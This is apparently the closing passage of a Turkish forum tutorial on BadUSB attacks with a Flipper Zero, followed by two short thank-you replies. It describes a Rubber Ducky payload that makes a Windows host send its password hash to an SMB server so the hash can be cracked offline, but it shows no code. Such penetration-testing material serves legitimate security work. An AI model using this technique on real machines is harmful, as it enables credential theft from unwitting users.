Aşağıdaki ekran görüntüsü, yukarıda açıklanan USB Rubber Ducky verisi kullanılarak Windows şifre karmalarının çalınmasını göstermektedir. Gördüğünüz gibi, ana bilgisayardaki [FONT=Monaco, Menlo, Consolas, Roboto Mono, Andale Mono, Ubuntu Mono, monospace]xxx[/FONT] kullanıcısı , şifre karmasını ileterek SMB sunucusunda başarıyla kimlik doğrulaması yaptı. Artık bu hash çevrimdışı olarak kırılabiliyor.

[+]Sonuç


Şahsen ben Flipper Zero ile çalışmaktan çok keyif alıyorum . BadUSB özelliğini bu kadar sevmemin nedeni kullanıcı dostu arayüzünden kaynaklanmaktadır. Yüklerin seçilmesi için kullanıcı dostu bir arayüze sahip olmak, kullanılabilirliği büyük ölçüde artırır. Bu, birden fazla veriyi depolamanıza ve bunlardan birini kolayca seçmenize olanak tanır; bu, fiziksel penetrasyon (penttest) gerçekleştirirken çok yararlı olabilir. BadUSB saldırısını Windows, Linux ve macOS bilgisayarlarda kullanabilir ve Flipper'a farklı işletim sistemleri için farklı payloadlar yükleyebilirsiniz.

ellerine saglık hocam güzel calışma

 

[legandrary]

ellerine saglık hocam güzel calışma

Teşekkür ederim